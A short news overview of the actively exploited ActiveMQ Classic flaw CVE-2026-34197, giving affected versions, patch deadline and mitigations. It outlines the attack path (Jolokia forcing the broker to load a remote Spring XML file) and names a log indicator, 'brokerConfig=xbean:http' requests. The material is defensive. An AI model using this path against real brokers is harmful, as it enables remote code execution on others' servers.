Overview
- CVE-2026-34197, which CISA added to its Known Exploited Vulnerabilities list on Thursday, now carries a federal patch deadline of April 30 for civilian agencies.
- The flaw lets attackers use the Jolokia web API to force the broker to load a remote Spring XML file that executes code on the ActiveMQ Java process.
- ActiveMQ Classic versions before 5.19.4 and 6.2.3 are affected, so admins should upgrade to 6.2.3 or the latest 5.19.x release and treat remediation as high priority.
- Access to Jolokia is supposed to require a login, yet default admin passwords are common and a separate bug in 6.0.0–6.1.1 can expose Jolokia without authentication, creating an easy path to remote code execution.
- Security firms report live probing and exploitation attempts against internet-facing brokers, with more than 7,500 servers exposed online, so teams should lock down /api/jolokia/, change default credentials, and watch logs for brokerConfig=xbean:http requests.